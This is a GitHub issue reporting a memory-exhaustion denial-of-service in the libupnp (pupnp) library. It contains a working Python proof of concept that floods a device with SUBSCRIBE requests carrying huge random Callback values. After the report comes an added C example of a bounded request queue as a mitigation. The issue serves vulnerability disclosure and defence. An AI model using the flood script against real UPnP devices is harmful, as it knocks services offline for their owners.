pupnp / pupnp

libupnp: Build UPnP-compliant control points, devices, and bridges on several operating systems.
https://pupnp.github.io/pupnp
BSD 3-Clause "New" or "Revised" License

Continuously sending a large number of SUBSCRIBE packets with random callback leads to memory resources being exhausted. #435

Open xzjpgithub opened 6 months ago

xzjpgithub commented 6 months ago

hi~

Continuously sending a large number of SUBSCRIBE packets with a random callback, for example: the following code is a PoC. In the PoC, the callback is not only random, but also contains 0x10000 a's (why 0x10000 a's? To trigger memory resource exhaustion more quickly).

```python
payload = """SUBSCRIBE /upnp/service/AVTransport/Event HTTP/1.1
Cache-Control: no-cache
Connection: Close
Pragma: no-cache
User-Agent: Microsoft-Windows/10.0 UPnP/1.0
NT: upnp:event
Callback: <http://192.168.1.44: 2869/upnp/eventing/tzdjdffymm1{}>
Timeout: Second-1800
Host: 192.168.1.4:25826
ServiceId: urn:upnp-org:serviceId:ConnectionManager

""".format("a" * 0x10000 + str(random.randint(0, 0xffffffff)))

for i in range(99999):
    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    addr1 = ('192.168.1.4', 25826)
    s1.connect(addr1)
    s1.send(payload.encode())
```

If you run the code, pupnp will constantly consume memory until the system kills it.

As for the reason, I think there are two threads, one for receiving and the other for processing. The one receiving SUBSCRIBE packets is fast, but the one dealing with SUBSCRIBE packets is slow. For transferring packets between the two threads, there must be a queue, which constantly consumes memory, for storing packets.

For some reason, I can't upload pictures to show the effect of the attack.

If you have any questions, ping me.

Best regards.
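The report above attributes the memory growth to an unbounded queue between a fast receiver and a slow worker. As an added example (not part of the original report and not libupnp code), this shows the general mitigation: the receiver admits a request only if the Callback value, the number of pending jobs and the total pending bytes all stay within fixed budgets. All names and limits here are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical limits (assumptions, not libupnp settings). */
#define MAX_PENDING_JOBS  64            /* requests waiting for a worker */
#define MAX_PENDING_BYTES (256 * 1024)  /* bytes held by queued requests */
#define MAX_CALLBACK_LEN  2048          /* longest Callback value accepted */

enum admit { ADMIT_OK, REJECT_CALLBACK_TOO_LONG, REJECT_QUEUE_FULL, REJECT_BYTES_FULL };

/* req is borrowed from the caller, which keeps it alive until the job is taken. */
struct job { const char *req; size_t len; };

struct bounded_queue {
    struct job slots[MAX_PENDING_JOBS];
    size_t head, count, bytes;
};

/* Length of the Callback header value, 0 if absent (case-sensitive match for brevity). */
static size_t callback_len(const char *req)
{
    const char *p = strstr(req, "\r\nCallback:");
    if (!p) return 0;
    p += strlen("\r\nCallback:");
    return strcspn(p, "\r\n");
}

/* Receiver side: refuse instead of growing. The caller holds the queue lock
 * and answers a rejected request with an HTTP error before closing. */
enum admit queue_admit(struct bounded_queue *q, const char *req, size_t len)
{
    if (callback_len(req) > MAX_CALLBACK_LEN) return REJECT_CALLBACK_TOO_LONG;
    if (q->count == MAX_PENDING_JOBS) return REJECT_QUEUE_FULL;
    if (q->bytes + len > MAX_PENDING_BYTES) return REJECT_BYTES_FULL;
    size_t tail = (q->head + q->count) % MAX_PENDING_JOBS;
    q->slots[tail].req = req;
    q->slots[tail].len = len;
    q->count++; q->bytes += len;
    return ADMIT_OK;
}

/* Worker side: take the oldest job; returns 0 when the queue is empty. */
int queue_take(struct bounded_queue *q, struct job *out)
{
    if (q->count == 0) return 0;
    *out = q->slots[q->head];
    q->head = (q->head + 1) % MAX_PENDING_JOBS;
    q->count--; q->bytes -= out->len;
    return 1;
}
```

With these budgets the memory held by pending requests is bounded by `MAX_PENDING_BYTES` regardless of how fast connections arrive; the worker's speed then limits throughput rather than memory use.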